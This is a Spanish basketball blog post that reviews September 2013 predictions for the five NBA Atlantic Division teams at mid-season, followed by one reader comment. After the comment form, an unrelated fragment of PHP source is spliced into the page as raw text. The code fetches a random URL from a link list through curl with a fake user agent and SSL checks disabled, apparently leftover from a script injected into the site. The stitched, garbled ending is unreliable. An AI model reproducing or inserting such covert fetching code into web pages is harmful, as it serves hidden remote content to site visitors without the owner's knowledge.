Revisando pronósticos: Atlántico

11 de February de 2014 por TheDeerHunter

Siempre es divertido revisar nuestro nivel de acierto a mitad de temporada. También es bueno reflexionar con un poco más de perspectiva sobre cómo está discurriendo la campaña.

Ha llegado el momento de saldar algunas cuentas. Pongámonos a caldo alegremente los unos a los otros. Sin piedad ni prisioneros, que nos cubrimos de gloria con esta división.

BOSTON CELTICS

Pronóstico Septiembre 2013: Sobre 25 victorias. Penúltimos de la Atlántico.
Probabilidad de acierto: Media-Alta
Calificación pronóstico: B

Progresión de victorias algo superior a la que previmos. Seguramente se quedarán más cerca de las 30 que de las 25 pero es bastante probable que acertemos el penúltimo puesto de la división.

No fuimos demasiado optimistas en esta primera fase de reconstrucción. De hecho, por momentos el equipo superó las expectativas de propios y extraños. Cuando decimos “propios” es fácil imaginar a más de un directivo inquieto ante la positiva marcha inicial del equipo, que llegó a aparecer bien colocados en la zona de playoffs de una conferencia con un nivel de exigencia ridículo y que incluso llegó a jugar bastante bien en algún tramo.

Quizá por ello se apresuraron a desprenderse de una de las sorpresas positivas del curso, Jordan Crawford (junto al ¿irrecuperable? Marshon Brooks) a cambio de un par de segundas más Joel Anthony para hacer bulto. Aquel variado abanico de escoltas que señalábamos como principal debilidad a principio de curso quedaba prácticamente desmantelado con la salida de Courtney Lee, a cambio de Jarryd Bayless. No estamos del todo seguros si será capaz de reencontrarse a sí mismo allí.

A estas alturas el equipo se ha estabilizado un poco en la línea que pronosticábamos. Pocas victorias y con un frontcourt más o menos funcionando, con la salvedad de Kelly Olynyk que no ha terminado de brillar. Aún no se ha resuelto la situación de Rajon Rondo, que ya se ha enrocado rechazando una oferta de renovación generosa, según la franquicia. Lo natural, ya lo dijimos, es que terminaran traspasándolo antes del límite. Teóricamente su vuelta era la excusa perfecta para largar a Crawford…

En cualquier caso la liga está muy loca en general y la conferencia más aún en particular. Tanquear parece no estar siendo nada sencillo porque muchos los están haciendo a conciencia. El objetivo era asegurar una elección lo más alta posible y a poco que te descuidas te metes en el 40 y pico por ciento de victorias que te priva de la lotería en el Este. A seguir alertas. 

BROOKLYN NETS

Pronóstico Septiembre 2013: Mas de 60 victorias y jaque mate. Campeones.
Probabilidad de acierto: Entre remota y ridículamente imposible.
Calificación pronóstico: E+

Sobre el papel plantillón. Creo que todos estábamos de acuerdo en ese punto en Septiembre. Nuestra apuesta, seguramente, demasiado ambiciosa para un proyecto tan “nuevo” con un técnico “rookie” al mando. Razones de peso, junto a las lesiones, para  funcionar tan mal los primeros meses, para ser más candidatos a convertirse en la decepción del año que en posibles campeones. Debemos admitir que si hubiera dependido de muchos de nosotros Jason Kidd no hubiera llegado con la cabeza sobre sus hombros a Navidad y seguramente también nos hubiéramos equivocado gravemente. Punto positivo por la paciencia demostrada porque empieza a dar sus frutos.

En una liga donde todo se termina decidiendo en la postemporada nadie puede asegurar que el análisis va a errar por completo, pero visto lo visto y con la sensible baja de López es una quimera pensar que podrían llegar en condiciones de disputar una serie a Miami o Indiana. De momento lo de las 60 victorias sí que podemos adelantar, en un alarde de audacia, que no las van a alcanzar.

Se observa que los Nets están evolucionando y comienzan a ser competitivos. Tal y como está la conferencia no debería extrañar que terminen encaramándose al primer puesto de la división y con él a la parte alta del cuadro en primera ronda. Apostaríamos a que con balance positivo. Todo gracias a las bondades del Este por que si no lo tendrían crudo.
Terminen como terminen difícilmente podrán quedar satisfechos porque con un proyecto vetarano con escaso recorrido, diseñado prácticamente para el todo o nada. En lo positivo podremos destacar el excelente desempeño de Brook Lopez en los 17 partidos que logró permanecer sano; el all-star de Joe Johnson (un punto discutible, siendo generosos); la elección de Mason Plumlee, de lo mejorcito de la nueva hornada; la recuperación para la causa de Andray Blatche y Mirza Teletovic, y comprobar que Deron Williams comienza a carburar mínimamente. En lo negativo, demasiadas derrotas bochornosas, así como el rendimiento de varios veteranos.

Seamos cautos. Habrá que dictar veredicto sobre ellos al final de curso porque para alguno el curso comienza tras el all-star. Este equipo está pensado de esa forma.

NEW YORK KNICKS

Pronóstico Septiembre 2013: Cerca de las 50 victorias. Segunda plaza en la Atlántico. 1ª Ronda.
Probabilidad de acierto: Hasta el rabo todo es toro… pero no se lo creen ni ellos.
Calificación pronóstico: D-

Qué decir de los New York Knicks… dan ganas de pasar al siguiente.

Anticipábamos que el listón no iba a ser muy alto. Además se han ido lesionando varios hombres clave en rivales directos y hay equipos que están por debajo (o muy por debajo) de las peores expectativas. Ni por esas. Una de las franquicias potencialmente más poderosas del mundo no se acercan a las eliminatorias por el título ni aunque las regalen (que las regalan) ¿Cómo analizar esta situación?

No sabría decir si da más pereza teorizar sobre las causas y los pecados de unos y otros o “disfrutar” de una de sus actuaciones en directo. Confieso que hay pocos que puedan llegar a desesperarme más que Carmelo Anthony, JR Smith y Andrea Bargnani cuando se ponen a ello. En las ocasiones en las que deciden ponerse a jugar demuestran todo el talento del mundo, pero ¿cuando ocurrirá eso? Ni el más sabio puede predecirlo.

Repetiremos la misma constante de la conferencia. Todo puede pasar, el pescado va muy barato y son capaces de colarse finalmente en playoffs e incluso hacerlo como segundos de la Atlántico. Cumplirían parcialmente nuestro pronóstico (que no contaba con que el listón fuera a estar sobre el 40%, claro) pero nos atreveríamos a calificar como grotesco que lograran ese premio.

La liga no se merece este nivel. Necesitamos unos Knicks a la altura de su historia y cuanto antes se resetee este calamitoso proyecto será mejor para todos. Seguramente será Woodson la cabeza de turco, pero en algún caso llueve sobre mojado.

PHILADELPHIA 76ERS

Pronóstico Septiembre 2013: Ultimísimos de la liga. Menos de 15 victorias. Le pondrán voluntad pero son tan sumamente limitados que harán sonrojarse más de una vez a sus aficionados.
Probabilidad de acierto: Nula
Calificación pronóstico: E

Fuimos durísimos con ellos. No estamos ante la revelación del curso que muchos llegaron a ver pero en ningún caso pueden compararse con el peor equipo de la historia. Ni siquiera lo van a ser de la conferencia (aunque tampoco quedarán muy lejos).

Las 15 victorias ya las han firmado e incluso han disputado algunos tramos a sorprendente buen nivel. A falta de ver a Nerlens Noel en acción disfrutan de un RoY en ciernes con Michael Carter-Williams, que por cierto estuvo lesionado unas semanas. Si demuestran tan buen ojo el próximo draft, con otro pick alto y tanto teórico “super-crack” para elegir habrá que terminar admitiendo que este curso puede terminar siendo excepcional para sus intereses a medio plazo.

Fue la percepción de Carter-Williams lo que nos llevó al equivoco. A nosotros y a una legión de medios especializados (así como a casi una decena de General Managers “estelares”, no olvidemos). Con él se digiere mejor la salida de Holiday, que tampoco llegó a estar como el curso pasado antes de lesionarse. Si Noel es la mitad de bueno de lo que decían y es algo más resistente de lo que muchos temen la jugada es redonda.

Esa columna vertebral de jóvenes menores de 26 que comentábamos, dentro de ciertos márgenes y de los objetivos que se perseguían, ha dejado más buen sabor de boca que otra cosa. El proyecto tiene todo el recorrido del mundo a falta de ir sumando piezas. Equipo a seguir.

TORONTO RAPTORS

Pronóstico Septiembre 2013: 7º conferencia Este (41-41). 1ª ronda de Playoffs.
Probabilidad de acierto: Media
Calificación pronóstico: C+

Interesante análisis, tanto como el panorama que se les presenta a los Raptors lo que queda de curso. Nuestra previa daba en el clavo porque los Raptors no terminaron de decidirse entre poner toda la carne en el asador y el “tankeo”. Soltar a Rudy Gay (o a Augustine) no era una declaración de intenciones para apostar fuerte en esta privilegiada ocasión para ganar la Atlántico sinó para dar galones a los jóvenes y de paso dejarse llevarse en un teórico mayor número de derrotas sin marcarlo como directriz de equipo. Muy elegante, por cierto.

La cuestión es que se ha terminado juntando el hambre con las ganas de comer y los chavales han respondido. Sin demasiada presión, all-star para Demar DeRozan (y otro que podría haber caído perfectamente en el contract year de Kyle Lowry) en una división que les da todas las facilidades del mundo para permanecer arriba. Aún no hemos visto lo mejor de Terrence Ross, ni lo mejor de Jonas Valanciunas… . Aunque hay que situar a Greivis Vasquez como una de las decepciones individuales del año.

Es curioso que su proyección supere sutilmente el 50% y que, como hipotéticos campeones de la Atlántico, entrarían por arriba del cuadro, aunque seguramente las urgencias llegarán después del all-star y todo será más difícil. Perfectamente se podría clavar el pronóstico. Mucho mérito sería cuando ni ellos mismos parecen tener claro hacia donde van.

En términos pragmáticos habría que plantearse si no están siendo demasiado inocentes por dejar pasar la oportunidad de captar una de esas fantásticas perlas de las hablan pero uno digiere regular eso de especular en una cancha de baloncesto. Sin demasiada fe en sus posibilidades reales de superar el primer cruce aún me parecería fantástico que estos chavales puedan vivir esa experiencia. También cuenta para el futuro.

Comenta

Un comentario a esta entrada

  1. Esteban dice:
    #1

    esta es sin duda la peor division de la nba, y quizá la peor de la historia

    genios en estadisticias, pueden confirmar esto? existen chances ciertas de que solo el campeon de division clasifique a PO

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>